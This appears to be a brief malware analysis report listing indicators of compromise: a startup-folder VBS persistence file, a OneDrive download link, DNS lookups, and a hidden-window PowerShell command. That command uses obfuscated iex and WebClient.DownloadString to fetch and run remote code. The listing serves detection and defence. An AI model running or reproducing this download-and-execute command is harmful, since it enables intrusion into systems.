Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\update.vbs
- https://onedrive.live.com/download?cid=1f9dbbce014d667c&resid=1f9dbbce014d667c%211840&authkey=ali7m6n0gqhj4jw
- 'on####ve.live.com':443
- 'lo###.live.com':443
- DNS ASK on####ve.live.com
- DNS ASK lo###.live.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''https://onedrive.live.com/download?cid=1F9DBBCE014D667C&resid=1F9DBBCE014D667C%211840&authkey=ALi7M6n0gQHj4jw'')'));...' (with hidden window)